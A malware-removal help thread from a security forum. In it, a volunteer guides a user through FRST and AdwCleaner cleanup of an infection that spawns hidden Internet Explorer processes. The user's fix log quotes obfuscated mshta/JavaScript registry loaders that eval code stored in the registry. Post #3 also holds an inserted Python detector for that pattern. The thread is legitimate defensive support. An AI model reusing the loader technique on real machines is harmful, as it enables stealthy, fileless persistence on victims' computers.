
Help! There are multiple Internet Explorers running in the background


  • This topic is locked
7 replies to this topic

#1 VNCBLAO

VNCBLAO

  • Members

Posted 17 June 2015 - 01:52 PM

Hi, 

I need a fixlist.txt because whenever I open Task Manager, there are several Internet Explorers running. I have used Farbar Recovery Scan Tool and attached are the FRST.txt and Addition.txt. 

 

I have a Windows desktop running Windows 7 Home Premium 64bit Service Pack 1

 

Could you please provide a fixlist.txt? Thank you

Attached File  FRST.txt   85.45KB   9 downloads

Attached File  Addition.txt   54.43KB   4 downloads




 


#2 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team

Posted 17 June 2015 - 08:43 PM

Hello VNCBLAO,

  • Welcome to Bleeping Computer.
  • My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstalling programs, deleting files, modifying the registry, and running scanners or tools.
      
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
      
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  • In the upper right hand corner of the topic you will see a button called Follow This Topic. I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.

      
  • Finally, please reply using the Post  button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.

 

 

1.

Download attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

Attached File  fixlist.txt   7.54KB   3 downloads

 

 

2.

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer.
  • After the scan has finished...
  • Click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

How is the machine running after this fix?

 

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#3 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members

Posted 18 June 2015 - 10:08 AM

Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:13-06-2015
Ran by Tuan at 2015-06-18 10:53:19 Run:1
Running from C:\Users\Tuan\Desktop
Loaded Profiles: Tuan (Available Profiles: Tuan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM-x32\...\Run: [**5ceec7bd<*>] => mshta javascript:GPN6w4Wa="NPkFObjk2";Ng5=new%20ActiveXObject("WScript.Shell");zYyQN0x3="6aG1XckwH";O3OEa=Ng5.RegRead("HKLM\\software\\Wow6432Node\\0f0b7255\\e3fb8071");XNrJ0c7a="4WG";eval(O3OEa);aCwZ (the data entry has 9 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**5ceec7bd<*>] => mshta javascript:UVrZanf83="AyZcY1FDl";Y8v=new%20ActiveXObject("WScript.Shell");yRgydccf3="U9q35fU";sLEn1=Y8v.RegRead("HKCU\\software\\0f0b7255\\e3fb8071");HpySx3qgE="m";eval(sLEn1);LOHo2SuoW="TnVbv"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**872a2c92<*>] => mshta javascript:BBz2dTFoh="jycnJkf28";Q7f=new%20ActiveXObject("WScript.Shell");w6QaaXx="xNc6SX";x1ZyH5=Q7f.RegRead("HKCU\\software\\0ef77b06\\43738959");i0alIdYJV="DgjRFzDv";eval(x1ZyH5);CXIRsc07="N" (the data entry has 1 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\...\Run: [**7a01a4ba<*>] => mshta javascript:C1RnZ8qkTt="MHO3g";h6o4=new%20ActiveXObject("WScript.Shell");nl8AMPpRl="9EoSqNGT";vpK9O=h6o4.RegRead("HKCU\\software\\0ef77b06\\43738959");VoVGeDh6m="Q6xqt2";eval(vpK9O);GYG1AyTFY0="R (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
ProxyServer: [S-1-5-21-2126934134-17229050-3056980699-1000] => 06952156:80
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
SearchScopes: HKU\S-1-5-21-2126934134-17229050-3056980699-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Live Malware Protection; C:\Windows\mlwps.exe [X] <==== ATTENTION
S1 StarOpen; No ImagePath
C:\Users\Tuan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogujwh.dll
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Tuan\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
Task: {6094364B-C305-4DE9-9BD7-B5CC0DED1099} - System32\Tasks\enpjhni => C:\Users\Tuan\AppData\Local\Temp\kxvgvai.exe <==== ATTENTION
Task: {B008A8C2-FF94-444C-8AC2-C8148E3353ED} - System32\Tasks\Windows Updater => C:\Users\Tuan\AppData\Roaming\Updater\winupd.exe <==== ATTENTION
Task: {CC7B26BC-88F9-416D-A099-52F8846EF0A3} - System32\Tasks\Malware Cleaner => C:\Users\Tuan\AppData\Roaming\6CD6.tmp.exe <==== ATTENTION
C:\Users\Tuan\AppData\Local\Temp\E2AA.tmp.exe
 
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**5ceec7bd<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**5ceec7bd<*> => value could not remove. Error getting handle(4): -1073741765
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**872a2c92<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**7a01a4ba<*> => value removed successfully
HKU\S-1-5-21-2126934134-17229050-3056980699-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found. 
gupdate => Service removed successfully
gupdatem => Service removed successfully
Live Malware Protection => Service removed successfully
StarOpen => Service removed successfully
"C:\Users\Tuan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpogujwh.dll" => File/Folder not found.
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-2126934134-17229050-3056980699-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6094364B-C305-4DE9-9BD7-B5CC0DED1099}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6094364B-C305-4DE9-9BD7-B5CC0DED1099}" => key removed successfully
C:\Windows\System32\Tasks\enpjhni => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\enpjhni" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B008A8C2-FF94-444C-8AC2-C8148E3353ED}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B008A8C2-FF94-444C-8AC2-C8148E3353ED}" => key removed successfully
C:\Windows\System32\Tasks\Windows Updater => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows Updater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CC7B26BC-88F9-416D-A099-52F8846EF0A3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC7B26BC-88F9-416D-A099-52F8846EF0A3}" => key removed successfully
C:\Windows\System32\Tasks\Malware Cleaner => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Malware Cleaner" => key removed successfully
"C:\Users\Tuan\AppData\Local\Temp\E2AA.tmp.exe" => File/Folder not found.
 
==== End of Fixlog 10:53:22 ====
 
AdwCleaner[S0].txt:
 
# AdwCleaner v4.206 - Logfile created 18/06/2015 at 10:59:00
# Updated 01/06/2015 by Xplode
# Database : 2015-06-17.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : Tuan - Tuan-PC
# Running from : C:\Users\Tuan\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : Live Malware Protection
[#] Service Deleted : PrivoxyService
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Program Files (x86)\Softcomp Software
Folder Deleted : C:\Users\Tuan\AppData\Roaming\Updater
 
***** [ Scheduled tasks ] *****
 
Task Deleted : Softcomp Software Uninstaller
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{2F137995-4D26-44AD-9C4E-91055090A817}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D3C24E2B-C820-4492-9B69-11BF7163F998}
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.logmeinrescue.*;*.radialpoint.*;*rogerspremiumservices.*
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17840
 
 
-\\ Google Chrome v43.0.2357.81
 
 
*************************
 
AdwCleaner[R0].txt - [1955 bytes] - [18/06/2015 10:56:39]
AdwCleaner[S0].txt - [1876 bytes] - [18/06/2015 10:59:00]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1935  bytes] ##########
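
The Run entries in the Fixlog above share one pattern: mshta is started with a javascript: URL that reads a second registry value with RegRead and passes it to eval, so the script itself lives in the registry rather than in a file. The following added example (not part of the original thread and not FRST's own logic) flags that pattern in FRST-style Run lines and lists the registry locations holding the script; the sample lines are constructed and their key names are placeholders.

```python
import re

# Constructed sample in the layout of FRST "Run:" lines; every name is a placeholder.
SAMPLE_LOG = r'''
HKLM\...\Run: [ExampleTray] => C:\Program Files\Example\tray.exe [123456 2015-01-01] (Example Corp)
HKLM-x32\...\Run: [**aaaa1111<*>] => mshta javascript:a="x";s=new%20ActiveXObject("WScript.Shell");p=s.RegRead("HKLM\\software\\Wow6432Node\\EXAMPLEKEY\\EXAMPLEVAL");eval(p); <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-0-0-0-1000\...\Run: [**bbbb2222<*>] => mshta javascript:b="y";t=new%20ActiveXObject("WScript.Shell");q=t.RegRead("HKCU\\software\\EXAMPLEKEY\\EXAMPLEVAL");eval(q); <===== ATTENTION (Value Name with invalid characters)
ProxyServer: [S-1-5-21-0-0-0-1000] => 127.0.0.1:80
'''

# Hive (optionally followed by a user SID), value name in brackets, then the value data.
RUN_LINE = re.compile(
    r'^(?P<hive>HK[^\\\s]+(?:\\S-1-[\d-]+)?)\\\.\.\.\\Run: '
    r'\[(?P<name>.*?)\] => (?P<data>.*)$', re.M)
REGREAD = re.compile(r'RegRead\(\s*"([^"]+)"', re.I)
INDICATORS = {
    "mshta_launcher": re.compile(r'^\s*"?mshta(?:\.exe)?"?\s', re.I),
    "javascript_scheme": re.compile(r'\bjavascript:', re.I),
    "wscript_shell": re.compile(r'ActiveXObject\(\s*"WScript\.Shell"', re.I),
    "eval_call": re.compile(r'\beval\s*\(', re.I),
}


def analyze(log_text):
    """Return one finding per Run line, with the indicators seen in its data."""
    findings = []
    for m in RUN_LINE.finditer(log_text):
        data = m.group("data")
        hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
        # The JavaScript string literal doubles each backslash; undo that
        # to recover the registry path the loader actually reads.
        payload = [p.replace("\\\\", "\\") for p in REGREAD.findall(data)]
        if payload:
            hits.append("registry_stored_script")
        if "invalid characters" in data:  # FRST's own annotation on the line
            hits.append("frst_invalid_value_name")
        suspicious = ({"mshta_launcher", "javascript_scheme"} <= set(hits)
                      and bool(payload or "eval_call" in hits))
        findings.append({"hive": m.group("hive"), "name": m.group("name"),
                         "indicators": hits, "payload_locations": payload,
                         "suspicious": suspicious})
    return findings


def followup_locations(findings):
    """Registry values to inspect and clean up along with the Run values."""
    return sorted({loc for f in findings if f["suspicious"]
                   for loc in f["payload_locations"]})


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f["hive"], f["name"], "SUSPICIOUS" if f["suspicious"] else "ok")
    print("Inspect:", followup_locations(results))
```

Removing only the Run value leaves the stored script in place, so the locations returned by `followup_locations` are worth comparing against the removal lines of a fix log.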
 


#4 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members

Posted 18 June 2015 - 10:15 AM

Hi Fireman4it

 

Thanks for getting back so quickly. Unfortunately, my computer is still lagging and running slow. Also, there are still multiple Internet Explorers running. 

 

Is there anything else we can do?

 

Thank you again



#5 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team

Posted 19 June 2015 - 10:47 PM

Yes, there is much more we can do. I have a family emergency and will get back with you as soon as possible.


#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team

Posted 26 June 2015 - 07:50 PM

  • Download Emsisoft Emergency Kit and save it to your desktop.
  • Double click on the EmsisoftEmergencyKit.exe icon, click Run then Extract
  • Double click the Start Emsisoft Emergency Kit icon that will appear after extraction
  • Click Yes to update the program
  • Once the update is completed click the Back button
  • Click on 2. Scan (not Quick Scan or Smart Scan)
  • Click Yes to detect Potentially Unwanted Programs (PUPs)
  • Patiently wait for the thorough scan to complete, this can be a lengthy process
  • Once completed click Quarantine selected objects (if computer is clean you will not have this option) then click OK
  • Click View Report
  • Attach the report to your reply
  • Close the program then click Close


#7 VNCBLAO

VNCBLAO
  • Topic Starter

  • Members

Posted 27 June 2015 - 10:07 AM

Hi Fireman4it

 

We have had a situation where the use of our computer was needed, therefore we took the steps necessary to reformat our computer. The computer is now running fast and efficiently.

 

Thank you very much for your time and effort in helping us in this matter. In the future, if we have any more problems, we will definitely come back to this forum for help. 

 

VNCBLAO



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team

Posted 28 June 2015 - 10:02 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.